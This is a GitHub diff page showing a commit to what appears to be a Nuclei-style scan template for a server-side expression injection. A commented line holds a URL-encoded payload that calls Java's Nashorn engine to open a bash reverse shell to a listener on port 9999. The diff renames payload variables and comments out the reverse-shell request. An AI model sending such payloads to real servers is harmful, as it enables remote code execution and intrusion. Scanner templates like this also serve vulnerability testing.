You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
# GET {{mypaths}}/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/docker.for.mac.localhost/9999%200%3E%261%27%29.start%28%29%22%29%7D/ HTTP/1.1
26
26
# # 107.182.191.202
27
27
requests:
28
28
- raw:
29
-
- |+
30
-
GET {{mypaths}}/{{pay1}} HTTP/1.1
31
-
Host: {{Hostname}}
32
-
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
33
-
Accept:*/*
34
-
Pragma:no-cache
35
-
Accept-Encoding:gzip, deflate
36
-
Connection: close
37
-
Content-Length: 0
29
+
#- |+
30
+
#GET {{mypaths}}/{{RvsPayload}} HTTP/1.1
31
+
# Host: {{Hostname}}
32
+
# User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
33
+
# Accept:*/*
34
+
# Pragma:no-cache
35
+
# Accept-Encoding:gzip, deflate
36
+
# Connection: close
37
+
# Content-Length: 0
38
38
39
39
- |+
40
-
GET {{mypaths}}/{{pay1}} HTTP/1.1
40
+
GET {{mypaths}}/{{CheckPayload1}} HTTP/1.1
41
41
Host: {{Hostname}}
42
42
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
0 commit comments